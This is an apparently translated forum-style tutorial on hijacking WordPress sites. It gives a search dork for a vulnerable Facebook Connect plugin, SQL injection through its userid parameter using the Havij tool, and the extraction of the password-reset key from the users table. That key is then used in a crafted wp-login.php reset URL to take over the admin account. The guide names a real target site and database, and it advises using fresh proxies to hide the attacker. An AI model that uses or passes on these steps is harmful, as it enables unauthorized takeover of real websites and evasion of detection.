Dork: inurl: "fbconnect_action = myhome" << amendable Tools: Havij Exploit: Forgot Password http://site/wp-login.php?action=rp&key=QbiDH7xcZJT3d53XnKmB&login=admin here I will give the target ... http://sinjai.linux.or.id/ http://sinjai.linux.or.id/?fbconnect_action=myhome&userid=2 change so http://sinjai.linux.or.id/?fbconnect_action=myhome&fbuserid=2 << Selected Column Count is 12 Valid String Column is 6 DB Server: MySQL Current DB: h80929_wp2 remember one important thing,,, http://site/wp-login.php?action=rp&key=QbiDH7xcZJT3d53XnKmB&login=admin site = http: / / sinjai.linux.or.id / QbiDH7xcZJT3d53XnKmB = activation key username = admin http://sinjai.linux.or.id/wp-login.php click forgot password or add the <>? action = lostpassword
http://sinjai.linux.or.id/wp-login.php?action=lostpassword
input << admin as the username that is in wp-table user who scanned through Havij ...

if here I get keynya YU4X3EwGEaHGueg2NA7S
how to get it into the table using Havij wp-user
so to exploit forgot password
http://site/wp-login.php?action=rp&key=QbiDH7xcZJT3d53XnKmB&login=admin
we develop ...
http://sinjai.linux.or.id/wp-login.php?action=rp&key=YU4X3EwGEaHGueg2NA7S&login=admin

and we enter the new password ..
and finally login ...
http://sinjai.linux.or.id/wp-login.php
username: admin
password: suit already in reset

4.bp.blogspot.com/-jem6374j5vY/T0cvMT6XtmI/AAAAAAAAALA/-s0S0Hodunw/s1600/linux.or.id.jpg
or this
when the reset will look like this
i1195.photobucket.com/albums/aa382/rizky1721/setelahdireset.jpg
and finally
i1195.photobucket.com/albums/aa382/rizky1721/bisakan.jpg

permasalan which often is not reset the password,
clear cookies, and find another target ..
if you want to succeed when Havij want to scan, input proxy,,
fresh proxy can from here
http://www.ip-adr...roxy_list/

credit: Dhendik